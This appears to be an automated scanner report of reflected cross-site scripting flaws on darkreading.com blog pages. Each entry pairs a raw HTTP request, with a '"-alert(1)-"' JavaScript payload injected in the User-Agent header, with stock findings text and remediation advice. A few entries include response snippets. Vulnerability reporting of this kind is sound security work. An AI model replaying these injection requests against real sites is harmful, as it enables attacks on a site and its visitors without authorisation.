GET /blog/227700535/using-the-36-stratagems-for-social-engineering.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b9e6e"-alert(1)-"6d7c7eb0628
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccaad"-alert(1)-"9130fa4a87d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700545/snort-ing-out-anomalies.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ccaad"-alert(1)-"9130fa4a87d
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51385"-alert(1)-"1c871573409 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700548/real-world-attacks-with-social-engineering-tookit.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)51385"-alert(1)-"1c871573409
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef9e3"-alert(1)-"bcb3ef2f77e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700577/suspected-child-porn-hub-taken-offline.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ef9e3"-alert(1)-"bcb3ef2f77e
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e457e"-alert(1)-"1a832d67b15 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700656/friction-free-security.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e457e"-alert(1)-"1a832d67b15
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dee26"-alert(1)-"b57a5ef6273 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700682/protecting-your-network-from-the-unpatchable.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)dee26"-alert(1)-"b57a5ef6273
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e98f"-alert(1)-"b78283368b2 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700741/conquering-large-web-apps-with-solid-methodology.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3e98f"-alert(1)-"b78283368b2
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7f91"-alert(1)-"60534d819ae was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700766/embedded-systems-can-mean-embedded-vulnerabilities.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c7f91"-alert(1)-"60534d819ae
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efc8d"-alert(1)-"bb0b242632c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/227700767/protecting-ssh-from-the-masses.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)efc8d"-alert(1)-"bb0b242632c
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4864c"-alert(1)-"c42f9dfdcd5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700795/there-s-a-recipe-for-that.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4864c"-alert(1)-"c42f9dfdcd5
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26537"-alert(1)-"736a47e9d9a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700800/security-s-top-4-social-engineers-of-all-time.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)26537"-alert(1)-"736a47e9d9a
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4e16"-alert(1)-"dc654227b78 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700826/taking-usb-attacks-to-the-next-level.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4e16"-alert(1)-"dc654227b78
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>Taking US
...[SNIP]...
The Next Level";
s.prop4="Taking USB Attacks To The Next Level";
s.prop5="blog";
s.prop6="";
s.prop7="John H. Sawyer";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4e16"-alert(1)-"dc654227b78";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop21="";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1df4a"-alert(1)-"a1951b512e5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700830/detection-and-defense-of-windows-autorun-locations.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1df4a"-alert(1)-"a1951b512e5
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6254"-alert(1)-"5d6cef25ebb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700832/make-security-about-security-not-compliance.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b6254"-alert(1)-"5d6cef25ebb
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8e20"-alert(1)-"4bc26a1db4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700835/that-was-easy-new-tool-for-web-form-password-brute-force-attacks.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8e20"-alert(1)-"4bc26a1db4
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
<title>That Was
...[SNIP]...
hat Was Easy: New Tool For Web Form Password Brute Force Attacks";
s.prop5="blog";
s.prop6="";
s.prop7="John H. Sawyer";
s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c8e20"-alert(1)-"4bc26a1db4";
s.prop9="";
s.prop10="";
s.prop11="";
s.prop12="";
s.prop14="";
s.prop15="";
s.prop16="";
s.prop19="False";
s.prop21="";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2ef5"-alert(1)-"f513882b49 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700845/ways-to-slow-an-attacker.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a2ef5"-alert(1)-"f513882b49
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794a5"-alert(1)-"f2d3c3fa726 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700846/data-visualization-for-faster-more-effective-pen-testing.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)794a5"-alert(1)-"f2d3c3fa726
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc47a"-alert(1)-"c29eabe679 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700848/vxworks-vulnerability-tools-released.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bc47a"-alert(1)-"c29eabe679
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94dc3"-alert(1)-"6e091a98372 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700867/gaining-a-foothold-by-exploiting-vxworks-vulns.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94dc3"-alert(1)-"6e091a98372
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42324"-alert(1)-"caed85c53b3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700876/web-based-spam-detection-with-google-alerts.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)42324"-alert(1)-"caed85c53b3
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb576"-alert(1)-"56e3ec9ff8b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700916/facebook-s-security-team-frustrates-cybercriminals.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fb576"-alert(1)-"56e3ec9ff8b
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17060"-alert(1)-"3703a1c8924 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700968/lock-picking-popularity-grows.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)17060"-alert(1)-"3703a1c8924
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66f72"-alert(1)-"f1ee25b6447 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700969/defcon-bridging-the-gap-between-hardware-and-software-hacking.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)66f72"-alert(1)-"f1ee25b6447
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94fa3"-alert(1)-"33e931c8169 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700991/top-excuses-for-foregoing-security-monitoring-logging.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)94fa3"-alert(1)-"33e931c8169
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae72a"-alert(1)-"da1a9ebd8dd was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227700998/blocking-zero-days-with-emet-2-0.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae72a"-alert(1)-"da1a9ebd8dd
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65853"-alert(1)-"fd93bf9ab9d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227900002/smb-guide-to-credit-card-regulations-part-2-the-low-hanging-fruit.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)65853"-alert(1)-"fd93bf9ab9d
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b31d6"-alert(1)-"78ea848ccee was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/227900004/hp-and-the-scary-corporate-fifth-column-concept.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)b31d6"-alert(1)-"78ea848ccee
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb56a"-alert(1)-"9799a4b5946 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/228200587/cookies-social-media-and-firesheep.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bb56a"-alert(1)-"9799a4b5946
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24589"-alert(1)-"280d8a8d9a5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/228200589/nosql-not-much-anyway.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)24589"-alert(1)-"280d8a8d9a5
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 449f7"-alert(1)-"87c6c58a228 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/228201020/larry-ellison-s-mistress-and-security-as-a-blame-game.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)449f7"-alert(1)-"87c6c58a228
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1daf6"-alert(1)-"0ea747e9dae was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
Request
GET /blog/228600139/avast-ye-pirates-it-s-free.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1daf6"-alert(1)-"0ea747e9dae
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf414"-alert(1)-"d9ad6501155 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/228800188/the-hazards-of-bot-volunteerism.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)bf414"-alert(1)-"d9ad6501155
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2bec6"-alert(1)-"f2914f15092 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2008/01/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2bec6"-alert(1)-"f2914f15092
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c03a"-alert(1)-"5db15ab0102 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2008/02/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5c03a"-alert(1)-"5db15ab0102
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e982a"-alert(1)-"903f6a92568 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/2008/03/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e982a"-alert(1)-"903f6a92568
Connection: close
Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6f7c"-alert(1)-"02550c4ddae was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
